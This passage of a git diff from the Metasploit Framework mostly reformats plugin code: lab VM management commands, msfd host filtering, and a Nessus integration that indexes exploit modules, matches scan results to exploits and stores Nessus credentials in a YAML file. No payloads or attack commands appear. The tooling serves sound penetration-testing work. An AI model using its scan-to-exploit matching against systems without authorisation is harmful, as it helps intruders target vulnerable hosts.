|vm| - print_line "Stopping lab vm #{vm.vmid}." - if vm.running? - vm.stop + @controller.each do |vm| + print_line "Starting lab vm #{vm.vmid}." + if !vm.running? + vm.start else - print_line "Lab vm #{vm.vmid} not running." + print_line "Lab vm #{vm.vmid} already running." end end else args.each do |arg| if @controller.includes_vmid? arg - vm = @controller.find_by_vmid(arg) - if vm.running? - print_line "Stopping lab vm #{vm.vmid}." - vm.stop + vm = @controller.find_by_vmid(arg) + if !vm.running? + print_line "Starting lab vm #{vm.vmid}." + vm.start else - print_line "Lab vm #{vm.vmid} not running." + print_line "Lab vm #{vm.vmid} already running." end - end + end end end - end + end + + def cmd_lab_stop(*args) + return lab_usage if args.empty? + + if args[0] == "all" + @controller.each do |vm| + print_line "Stopping lab vm #{vm.vmid}." + if vm.running? + vm.stop + else + print_line "Lab vm #{vm.vmid} not running." + end + end + else + args.each do |arg| + if @controller.includes_vmid? arg + vm = @controller.find_by_vmid(arg) + if vm.running? + print_line "Stopping lab vm #{vm.vmid}." + vm.stop + else + print_line "Lab vm #{vm.vmid} not running." + end + end + end + end + end def cmd_lab_suspend(*args) return lab_usage if args.empty? - + if args[0] == "all" @controller.each{ |vm| vm.suspend } else @@ -186,15 +187,15 @@ class Plugin::Lab < Msf::Plugin if @controller.find_by_vmid(arg).running? print_line "Suspending lab vm #{arg}." @controller.find_by_vmid(arg).suspend - end - end + end + end end end - end + end def cmd_lab_reset(*args) return lab_usage if args.empty? - + if args[0] == "all" print_line "Resetting all lab vms." @controller.each{ |vm| vm.reset } @@ -203,18 +204,18 @@ class Plugin::Lab < Msf::Plugin if @controller.includes_vmid? arg if @controller.find_by_vmid(arg).running? print_line "Resetting lab vm #{arg}." - @controller.find_by_vmid(arg).reset + @controller.find_by_vmid(arg).reset end - end + end end end - end + end def cmd_lab_snapshot(*args) return lab_usage if args.count < 2 - snapshot = args[args.count-1] - + snapshot = args[args.count-1] + if args[0] == "all" print_line "Snapshotting all lab vms to snapshot: #{snapshot}." @controller.each{ |vm| vm.create_snapshot(snapshot) } @@ -225,12 +226,12 @@ class Plugin::Lab < Msf::Plugin @controller[vmid_arg].create_snapshot(snapshot) end end - end + end def cmd_lab_revert(*args) return lab_usage if args.count < 2 - snapshot = args[args.count-1] + snapshot = args[args.count-1] if args[0] == "all" print_line "Reverting all lab vms to snapshot: #{snapshot}." @@ -239,10 +240,10 @@ class Plugin::Lab < Msf::Plugin args[0..-2].each do |vmid_arg| next unless @controller.includes_vmid? vmid_arg print_line "Reverting #{vmid_arg} to snapshot: #{snapshot}." - @controller[vmid_arg].revert_snapshot(snapshot) + @controller[vmid_arg].revert_snapshot(snapshot) end end - end + end def cmd_lab_run_command(*args) @@ -250,7 +251,7 @@ class Plugin::Lab < Msf::Plugin command = args[args.count-1] if args[0] == "all" print_line "Running command #{command} on all vms." - @controller.each do |vm| + @controller.each do |vm| if vm.running? print_line "#{vm.vmid} running command: #{command}." vm.run_command(command) @@ -260,19 +261,19 @@ class Plugin::Lab < Msf::Plugin args[0..-2].each do |vmid_arg| next unless @controller.includes_vmid? vmid_arg if @controller[vmid_arg].running? - print_line "#{vmid_arg} running command: #{command}." + print_line "#{vmid_arg} running command: #{command}." @controller[vmid_arg].run_command(command) end end end - end + end def cmd_lab_browse_to(*args) return lab_usage if args.empty? uri = args[args.count-1] if args[0] == "all" print_line "Opening: #{uri} on all vms." - @controller.each do |vm| + @controller.each do |vm| if vm.running? print_line "#{vm.vmid} opening to uri: #{uri}." vm.open_uri(uri) @@ -288,12 +289,12 @@ class Plugin::Lab < Msf::Plugin end end end - + ## ## Commands for help ## - + def longest_cmd_size commands.keys.map {|x| x.size}.sort.last end @@ -332,9 +333,9 @@ class Plugin::Lab < Msf::Plugin end end - print_line + print_line print_line "In order to use this plugin, you'll want to configure a .yml lab file" - print_line "You can find an example in data/lab/test_targets.yml" + print_line "You can find an example in data/lab/test_targets.yml" print_line end @@ -349,18 +350,18 @@ class Plugin::Lab < Msf::Plugin 'Columns' => [ 'Vmid', 'Name', 'Location', "Power?" ] ) - @controller.each do |vm| + @controller.each do |vm| tbl << [ vm.vmid, vm.name, vm.location, vm.running?] end - + print_line tbl.to_s end - + def hlp_print_lab_running - indent = ' ' + indent = ' ' tbl = Rex::Ui::Text::Table.new( 'Header' => 'Running Lab VMs', @@ -369,19 +370,19 @@ class Plugin::Lab < Msf::Plugin ) @controller.each do |vm| - if vm.running? - tbl << [ vm.vmid, + if vm.running? + tbl << [ vm.vmid, vm.name, vm.location, vm.running?] - end + end end print_line tbl.to_s end end - + # # The constructor is called when an instance of the plugin is created. The # framework instance that the plugin is being associated with is passed in @@ -427,6 +428,6 @@ class Plugin::Lab < Msf::Plugin def desc "Adds the ability to manage VMs" end - + end ## End Class end ## End Module diff --git a/plugins/msfd.rb b/plugins/msfd.rb index 3eadba8cdc..98b13ce1c5 100644 --- a/plugins/msfd.rb +++ b/plugins/msfd.rb @@ -104,13 +104,13 @@ class Plugin::Msfd < Msf::Plugin addr = Rex::Socket.resolv_nbo(client.peerhost) if opts['HostsAllowed'] and - not opts['HostsAllowed'].find { |x| x == addr } + not opts['HostsAllowed'].find { |x| x == addr } client.close next end if opts['HostsDenied'] and - opts['HostsDenied'].find { |x| x == addr } + opts['HostsDenied'].find { |x| x == addr } client.close next end diff --git a/plugins/nessus.rb b/plugins/nessus.rb index 62cf968746..a5a8d1cf2f 100644 --- a/plugins/nessus.rb +++ b/plugins/nessus.rb @@ -1,16 +1,18 @@ +# $Id$ +# $Revision$ require 'nessus/nessus-xmlrpc' require 'rex/parser/nessus_xml' module Msf - + #constants NBVer = "1.1" # Nessus Plugin Version. Increments each time we commit to msf Xindex = "#{Msf::Config.get_config_root}/nessus_index" # location of the exploit index file used to speed up searching for valid exploits. Nessus_yaml = "#{Msf::Config.get_config_root}/nessus.yaml" #location of the nessus.yml containing saved nessus creds - + class Plugin::Nessus < Msf::Plugin - + #creates the index of exploit details to make searching for exploits much faster. def create_xindex start = Time.now @@ -19,50 +21,50 @@ module Msf count = 0 # use Msf::Config.get_config_root as the location. File.open("#{Xindex}", "w+") do |f| - #need to add version line. - f.puts(Msf::Framework::RepoRevision) - framework.exploits.sort.each { |refname, mod| - case count - when 0 - print("\b\b\b[|]") - count += 1 - when 1 - print("\b\b\b[/]") - count += 1 - when 2 - print("\b\b\b[-]") - count += 1 - when 3 - print("\b\b\b[\\]") - count =0 - end - stuff = "" - o = nil - begin - o = mod.new - rescue ::Exception - end - stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" - next if not o - o.references.map do |x| - if !(x.ctx_id == "URL") - if (x.ctx_id == "MSB") - stuff << "|#{x.ctx_val}" - else - stuff << "|#{x.ctx_id}-#{x.ctx_val}" + #need to add version line. + f.puts(Msf::Framework::RepoRevision) + framework.exploits.sort.each { |refname, mod| + case count + when 0 + print("\b\b\b[|]") + count += 1 + when 1 + print("\b\b\b[/]") + count += 1 + when 2 + print("\b\b\b[-]") + count += 1 + when 3 + print("\b\b\b[\\]") + count =0 + end + stuff = "" + o = nil + begin + o = mod.new + rescue ::Exception + end + stuff << "#{refname}|#{o.name}|#{o.platform_to_s}|#{o.arch_to_s}" + next if not o + o.references.map do |x| + if !(x.ctx_id == "URL") + if (x.ctx_id == "MSB") + stuff << "|#{x.ctx_val}" + else + stuff << "|#{x.ctx_id}-#{x.ctx_val}" + end end end - end - stuff << "\n" - f.puts(stuff) - } + stuff << "\n" + f.puts(stuff) + } end total = Time.now - start print("\b\b\b[*]%clr") print("\n") print_status("It has taken : #{total} seconds to build the exploits search index") end - + def nessus_index if File.exist?("#{Xindex}") #check if it's version line matches current version. @@ -79,7 +81,7 @@ module Msf create_xindex end end - + class ConsoleCommandDispatcher include Msf::Ui::Console::CommandDispatcher def name @@ -126,11 +128,11 @@ module Msf "nessus_report_exploits" => "Shows a summary of all the vulns in a scan that have a msf exploit." } end - + def cmd_nessus_index Msf::Plugin::Nessus.nessus_index end - + def cmd_nessus_save(*args) #if we are logged in, save session details to nessus.yaml if args[0] == "-h" @@ -138,15 +140,15 @@ module Msf print_status(" nessus_save") return end - + if args[0] print_status("Usage: ") print_status(" nessus_save") return end - + group = "default" - + if ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) config = Hash.new config = {"#{group}" => {'username' => @user, 'password' => @pass, 'server' => @host, 'port' => @port}} @@ -154,15 +156,15 @@ module Msf f.puts YAML.dump(config) end print_good("#{Nessus_yaml} created.") - + else print_error("Missing username/password/server/port - relogin and then try again.") return end end - + def cmd_nessus_report_exploits(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_summary ") @@ -172,20 +174,20 @@ module Msf print_status("%redThis plugin is experimental%clr") return end - + if ! nessus_verify_db print_error("You need a database configured for this command.") print_error("Connect to a db with \"db_connect\"") print_error("Then import scan with nessus_report_get") return end - + if ! nessus_verify_token return end - + rid = nil - + case args.length when 1 rid = args[0] @@ -195,12 +197,12 @@ module Msf print_status("Parses your report and just shows you exploitable vulns.") return end - + if check_scan(rid) print_error("That scan is still running.") return end - + #streaming parser ftw. content = nil content=@n.report_file_download(rid) @@ -215,20 +217,20 @@ module Msf parser.on_found_host = Proc.new { |host| addr = host['addr'] || host['hname'] addr.gsub!(/[\n\r]/," or ") if addr - + os = host['os'] os.gsub!(/[\n\r]/," or ") if os - + hname = host['hname'] hname.gsub!(/[\n\r]/," or ") if hname - + mac = host['mac'] mac.gsub!(/[\n\r]/," or ") if mac - + host['ports'].each do |item| - + next if item['port'] == 0 - + exp = [] msf = nil nasl = item['nasl'].to_s @@ -237,21 +239,21 @@ module Msf name = item['svc_name'] severity = item['severity'] description = item['description'] - cve = item['cve'] + cve = item['cve'] bid = item['bid'] xref = item['xref'] msf = item['msf'] - + # find exploits based on the msf plugin name from the report output. if msf regex = Regexp.new(msf, true, 'n') File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end - + # find exploits based on CVE if cve cve.each do |c| @@ -259,11 +261,11 @@ module Msf File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end end - + #find exploits based on BID if bid bid.each do |c| @@ -273,13 +275,13 @@ module Msf File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end end - + #find exploits based on OSVDB entry - + #find exploits based on MSB if xref xref.each do |c| @@ -289,12 +291,12 @@ module Msf File.open("#{Xindex}", "r") do |m| while line = m.gets exp.push line.split("|").first if (line.match(regex)) - end + end end end end end - + nss = 'NSS-' + nasl next if exp.empty? print("#{addr} | #{os} | #{port} | #{nss} | Sev #{severity} | %bld%red#{exp.uniq}%clr\n") @@ -313,11 +315,11 @@ module Msf print_status("use nessus_policy_list to list all available policies") return end - + if ! nessus_verify_token return end - + case args.length when 2 pid = args[0].to_i @@ -328,30 +330,30 @@ module Msf print_status(" use nessus_policy_list to list all available policies") return end - + if check_policy(pid) print_error("That policy does not exist.") return end - + tgts = "" framework.db.hosts(framework.db.workspace).each do |host| tgts << host.address tgts << "," end - + tgts.chop! - + print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning all hosts in workspace") - + scan = @n.scan_new(pid, name, tgts) - + if scan print_status("Scan started. uid is #{scan}") end - + end - + def cmd_nessus_logout @token = nil print_status("Logged out") @@ -359,14 +361,14 @@ module Msf print_good("#{Nessus_yaml} removed.") return end - + def cmd_nessus_help(*args) tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Command', 'Help Text' - ]) + ] + ) tbl << [ "Generic Commands", "" ] tbl << [ "-----------------", "-----------------"] tbl << [ "nessus_connect", "Connect to a nessus server" ] @@ -415,12 +417,13 @@ module Msf tbl << [ "-----------------", "-----------------"] tbl << [ "nessus_policy_list", "List all polciies" ] tbl << [ "nessus_policy_del", "Delete a policy" ] - puts "\n" - puts tbl.to_s + "\n" + print_status "" + print_status tbl.to_s + print_status "" end - + def cmd_nessus_server_feed(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_server_feed") @@ -429,23 +432,22 @@ module Msf print_status("Returns information about the feed type and server version.") return end - + if nessus_verify_token @feed, @version, @web_version = @n.feed tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Feed', 'Nessus Version', 'Nessus Web Version' ]) tbl << [@feed, @version, @web_version] print_good("Nessus Status") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end end - + def nessus_verify_token if @token.nil? or @token == '' ncusage @@ -453,16 +455,16 @@ module Msf end true end - + def nessus_verify_db - + if ! (framework.db and framework.db.active) print_error("No database has been configured, please use db_create/db_connect first") return false end true end - + def ncusage print_status("%redYou must do this before any other commands.%clr") print_status("Usage: ") @@ -480,9 +482,9 @@ module Msf print_status("This only works after you have saved creds with nessus_save") return end - + def cmd_nessus_connect(*args) - + if ! args[0] if File.exist?("#{Nessus_yaml}") lconfig = YAML.load_file("#{Nessus_yaml}") @@ -497,7 +499,7 @@ module Msf return end end - + if args[0] == "-h" print_status("%redYou must do this before any other commands.%clr") print_status("Usage: ") @@ -521,19 +523,19 @@ module Msf print_status("know that nessus used a self signed cert and the risk that presents.") return end - + if ! @token == '' print_error("You are already authenticated. Call nessus_logout before authing again") return end - + if(args.length == 0 or args[0].empty?) ncusage return end - + @user = @pass = @host = @port = @sslv = nil - + case args.length when 1,2 if args[0].include? "@" @@ -548,7 +550,7 @@ module Msf @port ||= '8834' @sslv = args[1] end - + when 3,4,5 ncusage return @@ -556,12 +558,12 @@ module Msf ncusage return end - + if /\/\//.match(@host) ncusage return end - + if(@host != "localhost" and @host != "127.0.0.1" and @sslv != "ok") print_error("Warning: SSL connections are not verified in this release, it is possible for an attacker") print_error(" with the ability to man-in-the-middle the Nessus traffic to capture the Nessus") @@ -569,36 +571,34 @@ module Msf print_error(" as an additional parameter to this command.") return end - + if ! @user print_good("Username:") - $stdout.flush @user = gets @user.chomp! end - + if ! @pass print_good("Password:") - $stdout.flush @pass = gets @pass.chomp! end - + if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) ncusage return end nessus_login end - + def nessus_login - + if ! ((@user and @user.length > 0) and (@host and @host.length > 0) and (@port and @port.length > 0 and @port.to_i > 0) and (@pass and @pass.length > 0)) print_status("You need to connect to a server first.") ncusage return end - + @url = "https://#{@host}:#{@port}/" print_status("Connecting to #{@url} as #{@user}") @n=NessusXMLRPC::NessusXMLRPC.new(@url,@user,@pass) @@ -610,9 +610,9 @@ module Msf return end end - + def cmd_nessus_report_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_list") @@ -621,35 +621,34 @@ module Msf print_status("Generates a list of all reports visable to your user.") return end - + if ! nessus_verify_token return end - + list=@n.report_list_hash - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'ID', 'Name', 'Status', 'Date' ]) - + list.each {|report| t = Time.at(report['timestamp'].to_i) tbl << [ report['id'], report['name'], report['status'], t.strftime("%H:%M %b %d %Y") ] } print_good("Nessus Report List") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("You can:") print_status(" Get a list of hosts from the report: nessus_report_hosts ") end - + def check_scan(*args) - + case args.length when 1 rid = args[0] @@ -657,7 +656,7 @@ module Msf print_error("No Report ID Supplied") return end - + scans = @n.scan_list_hash scans.each {|scan| if scan['id'] == rid @@ -666,9 +665,9 @@ module Msf } return false end - + def cmd_nessus_report_get(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_get ") @@ -680,24 +679,24 @@ module Msf print_status("Use: nessus_report_list to obtain a list of report id's") return end - + if ! nessus_verify_token return end - + if ! nessus_verify_db return end - + if(args.length == 0 or args[0].empty? or args[0] == "-h") print_status("Usage: ") print_status(" nessus_report_get ") print_status(" use nessus_report_list to list all available reports for importing") return end - + rid = nil - + case args.length when 1 rid = args[0] @@ -707,7 +706,7 @@ module Msf print_status(" use nessus_report_list to list all available reports for importing") return end - + if check_scan(rid) print_error("That scan is still running.") return @@ -720,41 +719,38 @@ module Msf end print_status("importing " + rid) framework.db.import({:data => content}) do |type,data| - case type + case type when :address @count = 0 - print("%bld%blu[*]%clr %bld#{data}%clr") - $stdout.flush + print_line("%bld%blu[*]%clr %bld#{data}%clr") when :port - print("\b") + print_line("\b") case @count when 0 - print("%bld%grn|") + print_line("%bld%grn|") @count += 1 when 1 - print("%bld%grn/") + print_line("%bld%grn/") @count += 1 when 2 - print("%bld%grn-") + print_line("%bld%grn-") @count += 1 when 3 - print("%bld%grn/") + print_line("%bld%grn/") @count = 0 end - $stdout.flush when :end - print("\b Done!%clr\n") - $stdout.flush - when :os + print_line("\b Done!%clr\n") + when :os data.gsub!(/[\n\r]/," or ") if data - print(" #{data} ") - end + print_line(" #{data} ") + end end print_good("Done") end - + def cmd_nessus_scan_status(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_status") @@ -763,11 +759,11 @@ module Msf print_status("Returns a list of information about currently running scans.") return end - + if ! nessus_verify_token return end - + list=@n.scan_list_hash if list.empty? print_status("No Scans Running.") @@ -776,10 +772,9 @@ module Msf print_status(" Create a scan: nessus_scan_new ") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Scan ID', 'Name', 'Owner', @@ -788,22 +783,22 @@ module Msf 'Current Hosts', 'Total Hosts' ]) - + list.each {|scan| t = Time.at(scan['start'].to_i) tbl << [ scan['id'], scan['name'], scan['owner'], t.strftime("%H:%M %b %d %Y"), scan['status'], scan['current'], scan['total'] ] } print_good("Running Scans") - puts "\n" - puts tbl.to_s + "\n" - puts "\n" + print_good "\n" + print_good tbl.to_s + "\n" + print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") print_good(" Pause a nessus scan : nessus_scan_pause ") end - + def cmd_nessus_template_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_template_list") @@ -812,13 +807,13 @@ module Msf print_status("Returns a list of information about the server templates..") return end - + if ! nessus_verify_token return end - + list=@n.template_list_hash - + if list.empty? print_status("No Templates Created.") print_status("You can:") @@ -826,30 +821,29 @@ module Msf print_status(" Create a template: nessus_template_new ") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Template ID', 'Policy ID', 'Name', 'Owner', 'Target' ]) - + list.each {|template| tbl << [ template['name'], template['pid'], template['rname'], template['owner'], template['target'] ] } print_good("Templates") - puts "\n" - puts tbl.to_s + "\n" - puts "\n" + print_good "\n" + print_good tbl.to_s + "\n" + print_good "\n" print_status("You can:") print_good(" Import Nessus report to database : nessus_report_get ") end - + def cmd_nessus_user_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_list") @@ -858,36 +852,35 @@ module Msf print_status("Returns a list of the users on the Nessus server and their access level.") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_status("Your Nessus user is not an admin") end - + list=@n.users_list print_good("There are #{list.length} users") tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Name', 'Is Admin?', 'Last Login' ]) - + list.each {|user| t = Time.at(user['lastlogin'].to_i) tbl << [ user['name'], user['admin'], t.strftime("%H:%M %b %d %Y") ] } print_good("Nessus users") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_server_status(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_server_status") @@ -900,19 +893,18 @@ module Msf if ! nessus_verify_token return end - + #Check if we are an admin if ! @n.is_admin print_status("You need to be an admin for this.") return end - + #Versions cmd_nessus_server_feed - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Users', 'Policies', 'Running Scans', @@ -922,19 +914,19 @@ module Msf #Count how many users the server has. list=@n.users_list users = list.length - + #Count how many policies list=@n.policy_list_hash policies = list.length - + #Count how many running scans list=@n.scan_list_uids scans = list.length - + #Count how many reports are available list=@n.report_list_hash reports = list.length - + #Count how many plugins list=@n.plugins_list total = Array.new @@ -943,12 +935,12 @@ module Msf } plugins = total.sum tbl << [users, policies, scans, reports, plugins] - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_plugin_list(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_list") @@ -957,14 +949,13 @@ module Msf print_status("Returns a list of the plugins on the server per family.") return end - + if ! nessus_verify_token return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Family Name', 'Total Plugins' ]) @@ -978,13 +969,13 @@ module Msf tbl << [ '', ''] tbl << [ 'Total Plugins', plugins ] print_good("Plugins By Family") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("List plugins for a family : nessus_plugin_family ") end - + def check_policy(*args) - + case args.length when 1 pid = args[0] @@ -992,7 +983,7 @@ module Msf print_error("No Policy ID supplied.") return end - + pol = @n.policy_list_hash pol.each {|p| if p['id'].to_i == pid @@ -1001,9 +992,9 @@ module Msf } return true end - + def cmd_nessus_scan_new(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_new ") @@ -1013,11 +1004,11 @@ module Msf print_status("use nessus_policy_list to list all available policies") return end - + if ! nessus_verify_token return end - + case args.length when 3 pid = args[0].to_i @@ -1029,23 +1020,23 @@ module Msf print_status(" use nessus_policy_list to list all available policies") return end - + if check_policy(pid) print_error("That policy does not exist.") return end - + print_status("Creating scan from policy number #{pid}, called \"#{name}\" and scanning #{tgts}") - + scan = @n.scan_new(pid, name, tgts) - + if scan print_status("Scan started. uid is #{scan}") end end - + def cmd_nessus_scan_pause(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_pause ") @@ -1055,11 +1046,11 @@ module Msf print_status("use nessus_scan_status to list all available scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 sid = args[0] @@ -1069,14 +1060,14 @@ module Msf print_status(" use nessus_scan_status to list all available scans") return end - + pause = @n.scan_pause(sid) - + print_status("#{sid} has been paused") end - + def cmd_nessus_scan_resume(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_resume ") @@ -1086,11 +1077,11 @@ module Msf print_status("use nessus_scan_status to list all available scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 sid = args[0] @@ -1100,14 +1091,14 @@ module Msf print_status(" use nessus_scan_status to list all available scans") return end - + resume = @n.scan_resume(sid) - + print_status("#{sid} has been resumed") end - + def cmd_nessus_report_hosts(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_hosts ") @@ -1117,11 +1108,11 @@ module Msf print_status("use nessus_report_list to list all available scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 rid = args[0] @@ -1131,10 +1122,9 @@ module Msf print_status(" use nessus_report_list to list all available reports") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Hostname', 'Severity', 'Sev 0', @@ -1149,14 +1139,14 @@ module Msf tbl << [ host['hostname'], host['severity'], host['sev0'], host['sev1'], host['sev2'], host['sev3'], host['current'], host['total'] ] } print_good("Report Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("You can:") print_status(" Get information from a particular host: nessus_report_host_ports ") end - + def cmd_nessus_report_host_ports(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_host_ports ") @@ -1165,11 +1155,11 @@ module Msf print_status("Returns all the ports associated with a host and details about their vulnerabilities") print_status("use nessus_report_hosts to list all available hosts for a report") end - + if ! nessus_verify_token return end - + case args.length when 2 host = args[0] @@ -1180,10 +1170,9 @@ module Msf print_status(" use nessus_report_list to list all available reports") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Port', 'Protocol', 'Severity', @@ -1198,14 +1187,14 @@ module Msf tbl << [ port['portnum'], port['protocol'], port['severity'], port['svcname'], port['sev0'], port['sev1'], port['sev2'], port['sev3'] ] } print_good("Host Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" print_status("You can:") print_status(" Get detailed scan infromation about a specfic port: nessus_report_host_detail ") end - + def cmd_nessus_report_host_detail(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_report_host_detail ") @@ -1215,11 +1204,11 @@ module Msf print_status("use nessus_report_host_ports to list all available ports for a host") return end - + if ! nessus_verify_token return end - + case args.length when 4 host = args[0] @@ -1232,10 +1221,9 @@ module Msf print_status(" use nessus_report_host_ports to list all available ports") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Port', 'Severity', 'PluginID', @@ -1248,15 +1236,25 @@ module Msf ]) details=@n.report_host_port_details(rid, host, port, prot) details.each {|detail| - tbl << [ detail['port'], detail['severity'], detail['pluginID'], detail['pluginName'], detail['cvss_base_score'] || 'none', detail['exploit_available'] || '.', detail['cve'] || '.', detail['risk_factor'] || '.', detail['cvss_vector'] || '.' ] + tbl << [ + detail['port'], + detail['severity'], + detail['pluginID'], + detail['pluginName'], + detail['cvss_base_score'] || 'none', + detail['exploit_available'] || '.', + detail['cve'] || '.', + detail['risk_factor'] || '.', + detail['cvss_vector'] || '.' + ] } print_good("Port Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_scan_pause_all(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_pause_all") @@ -1266,18 +1264,18 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + pause = @n.scan_pause_all - + print_status("All scans have been paused") end - + def cmd_nessus_scan_stop(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_stop ") @@ -1287,11 +1285,11 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + case args.length when 1 sid = args[0] @@ -1301,14 +1299,14 @@ module Msf print_status(" use nessus_scan_status to list all available scans") return end - + pause = @n.scan_stop(sid) - + print_status("#{sid} has been stopped") end - + def cmd_nessus_scan_stop_all(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_stop_all") @@ -1318,18 +1316,18 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + pause = @n.scan_stop_all - + print_status("All scans have been stopped") end - + def cmd_nessus_scan_resume_all(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_scan_resume_all") @@ -1339,18 +1337,18 @@ module Msf print_status("use nessus_scan_list to list all running scans") return end - + if ! nessus_verify_token return end - + pause = @n.scan_resume_all - + print_status("All scans have been resumed") end - + def cmd_nessus_user_add(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_add ") @@ -1360,16 +1358,16 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 2 user = args[0] @@ -1380,7 +1378,7 @@ module Msf print_status(" Only adds non admin users") return end - + u = @n.users_list u.each { |stuff| if stuff['name'] == user @@ -1396,9 +1394,9 @@ module Msf print_error("#{user} was not added") end end - + def cmd_nessus_user_del(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_del ") @@ -1408,16 +1406,16 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 1 user = args[0] @@ -1427,7 +1425,7 @@ module Msf print_status(" Only dels non admin users") return end - + del = @n.user_del(user) status = del.root.elements['status'].text if status == "OK" @@ -1436,9 +1434,9 @@ module Msf print_error("#{user} was not deleted") end end - + def cmd_nessus_user_passwd(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_user_passwd ") @@ -1448,16 +1446,16 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") return end - + case args.length when 2 user = args[0] @@ -1468,7 +1466,7 @@ module Msf print_status(" User list from nessus_user_list") return end - + pass = @n.user_pass(user,pass) status = pass.root.elements['status'].text if status == "OK" @@ -1477,9 +1475,9 @@ module Msf print_error("#{user}'s password has not been changed") end end - + def cmd_nessus_admin(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_admin") @@ -1489,20 +1487,20 @@ module Msf print_status("use nessus_user_list to list all users") return end - + if ! nessus_verify_token return end - + if ! @n.is_admin print_error("Your Nessus user is not an admin") else print_good("Your Nessus user is an admin") end end - + def cmd_nessus_plugin_family(*args) - + if args[0] == "-h" print_status("Usage: ") print_status(" nessus_plugin_family ") @@ -1512,11 +1510,11 @@ module Msf print_status("use nessus_plugin_list to list all plugins") return end - + if ! nessus_verify_token return end - + case args.length when 1 fam = args[0] @@ -1526,27 +1524,26 @@ module Msf print_status(" list all plugins from a Family from nessus_plugin_list") return end - + tbl = Rex::Ui::Text::Table.new( - 'Columns' => - [ + 'Columns' => [ 'Plugin ID', 'Plugin Name', 'Plugin File Name' ]) - + family = @n.plugin_family(fam) - + family.each {|plugin| tbl << [ plugin['id'], plugin['name'], plugin['filename'] ] } print_good("#{fam} Info") - puts "\n" - puts tbl.to_s + "\n" + print_good "\n" + print_good tbl.to_s + "\n" end - + def cmd_nessus_policy_list(*args) - + if args[0] == 